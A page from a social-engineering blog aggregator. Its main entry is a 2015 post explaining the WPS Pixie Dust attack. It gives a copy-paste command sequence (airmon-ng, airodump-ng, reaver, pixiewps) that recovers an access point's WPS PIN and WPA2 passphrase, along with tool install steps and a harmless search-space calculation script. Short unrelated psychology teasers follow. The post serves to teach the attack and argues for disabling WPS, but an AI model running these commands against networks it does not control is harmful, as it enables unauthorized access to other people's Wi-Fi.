Social Engineering Blogs

An Aggregator for Blogs About Social Engineering and Related Fields

Subliminal Hacking Blog September 21, 2015

How To Crack WPS with Pixie Dust … Offline Attacking

In this post we are looking at how vulnerable WPS makes your Access Point. WiFi Protected Setup makes it nice and easy for you to connect to your wireless devices by using a simple PIN instead of your hard-to-guess passphrase. The issue is that this means your secure 32 character passphrase is about as much use as a chocolate fireguard: instead of taking potentially years to crack, you can attack the PIN, which takes only 11,000 guesses at most, and this can be cracked in hours (even with timeouts and other controls in place).

In this video we will show how a vulnerability in some of the chipsets of Wireless Access Points allows you to crack the WPS PIN in less than a second, as well as revealing the WPA passphrase. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.

The way this works is that the Enrollee Hashes (E-Hash1 / E-Hash2) are supposed to be secret hashes, but when they are disclosed we can use them along with the Enrollee and Registrar Public Keys, the E and R Nonces and the Auth Key to recover the WPS PIN.

Just to provide some comparison, using the WPS PixieDust attack we got the PIN and then the WPA2 passphrase in less than a second. Stealing the WPA2 hash and attacking it directly with a single GPU, the estimated time to crack (knowing it is alphanumeric with no special characters) is 853,399 days, 2 hours and 44 minutes, so yeah, WPS adds some weakness to your hardened access point :)
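The 11,000 figure above is a consequence of how the WPS PIN is designed, and the comparison with the passphrase is easier to see once the two search spaces sit side by side. The following Python script is an added example, not code from the original post or from the reaver/pixiewps projects; it assumes, from the WPS 1.0 specification, that the PIN is eight decimal digits whose last digit is a checksum of the first seven, and that the registrar acknowledges the two halves of the PIN separately. It never talks to an access point; it only quantifies the risk the post describes, which is the number a defender wants when deciding whether to leave WPS enabled.

```python
# Added example (not part of the original post): why the WPS PIN is a small
# search space compared with the WPA2 passphrase it protects.
#
# Assumptions, from the WPS 1.0 specification rather than from the post:
#   * the PIN is 8 decimal digits and the 8th digit is a checksum of the first 7;
#   * the registrar confirms the two halves of the PIN separately (digits 1-4,
#     then digits 5-8), so each half can be verified on its own.
# Nothing here talks to an access point; it only quantifies the risk.

from math import log2


def wps_pin_checksum(first_seven: int) -> int:
    """Checksum digit for a 7-digit WPS PIN body, as defined in the WPS spec."""
    if not 0 <= first_seven <= 9_999_999:
        raise ValueError("expected a 7-digit PIN body")
    accum = 0
    remaining = first_seven
    while remaining:
        accum += 3 * (remaining % 10)   # odd positions (from the right) weigh 3
        remaining //= 10
        accum += remaining % 10         # even positions weigh 1
        remaining //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if `pin` is 8 digits and its last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_pin_checksum(int(pin[:7])) == int(pin[7])


def wps_pin_search_space(split_verification: bool = True) -> int:
    """Worst-case number of PIN guesses an online brute force needs.

    Without the split, every 7-digit body is a candidate (the checksum is
    derived, not guessed): 10**7.  With the split, the first half is found
    in at most 10**4 guesses and the second half in at most 10**3, because
    its last digit is fixed by the checksum: 10**4 + 10**3 = 11,000.
    """
    if not split_verification:
        return 10 ** 7
    return 10 ** 4 + 10 ** 3


def passphrase_search_space(length: int, alphabet_size: int) -> int:
    """Number of candidate passphrases of a given length over an alphabet."""
    return alphabet_size ** length


def compare(passphrase_len: int = 32, alphabet_size: int = 62) -> dict:
    """Bits of work for the PIN path versus the passphrase path.

    Defaults match the post: a 32-character alphanumeric passphrase
    (26 lower + 26 upper + 10 digits = 62 symbols).
    """
    pin_space = wps_pin_search_space()
    pp_space = passphrase_search_space(passphrase_len, alphabet_size)
    return {
        "wps_pin_guesses": pin_space,
        "wps_pin_bits": round(log2(pin_space), 1),
        "passphrase_bits": round(log2(pp_space), 1),
    }


if __name__ == "__main__":
    # 12345670 is the well-known example PIN from the WPS specification.
    print("12345670 valid:", is_valid_wps_pin("12345670"))
    print(compare())
```

The point of `compare()` is the gap between roughly 13 bits of work for the PIN path and roughly 190 bits for the passphrase path: hardening the passphrase does nothing while the PIN path is open, which is why the fix is to disable WPS on the access point rather than to lengthen the passphrase.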

Below are the commands used in the video; you can copy and paste them, filling in your own information (channel, BSSID and the values captured from your Access Point).

iwconfig                           # list the wireless interfaces

airmon-ng start wlan1              # put wlan1 into monitor mode (creates wlan1mon)

airmon-ng check kill               # stop processes that interfere with monitor mode

airodump-ng wlan1mon --wps         # scan; the WPS column shows whether WPS is enabled

reaver -i wlan1mon -c -b -vv       # -c channel and -b BSSID of your Access Point from the airodump-ng output

pixiewps -e -r -s -z -a -n         # -e PKE, -r PKR, -s E-Hash1, -z E-Hash2, -a AuthKey, -n E-Nonce, as captured by reaver

reaver -i wlan1mon -c -b -vv -K 1  # -K 1 runs the pixie dust attack from within reaver

If you are looking to do this on Ubuntu and not Kali, you will need the following packages (cheers Matt):

apt-get install build-essential libnl-3-dev libnl-genl-3-dev

wget http://download.aircrack-ng.org/aircrack-ng.1.2-rc2.tar.gz

git clone https://github.com/t6x/reaver-wps-fork-t6x

git clone https://github.com/wiire/pixiewps

Finally, in the WPS column you need to see one of the following values to confirm that the Access Point has WPS enabled; if none appears, either WPS isn't supported on the device or you have successfully disabled it: 1.0, LAB, PBC, NFC, PIN.

Filed Under: Hacking, Tools

Changing Minds Blog September 19, 2015

The ‘Next Village Effect’ and ‘thinking makes it so’

Why do we hate the people in the village just down the road?

Filed Under: Uncategorized

The Emotion News Blog September 18, 2015

Understanding the Early-Life Origins of Extreme Anxiety—Role of the Amygdala

The internalizing disorders—anxiety and depression—are a major human blight. According to the World Health Organization and National Institute of Mental Health, depression is responsible for more years lost to illness and disability than any other medical condition, including such familiar scourges as diabetes and chronic respiratory disorders. Anxiety disorders are the most common family of psychiatric […]

The post Understanding the Early-Life Origins of Extreme Anxiety—Role of the Amygdala appeared first on Emotion News.

Filed Under: neuroticism, Science

© Copyright 2025 Social Engineering Blogs · All Rights Reserved ·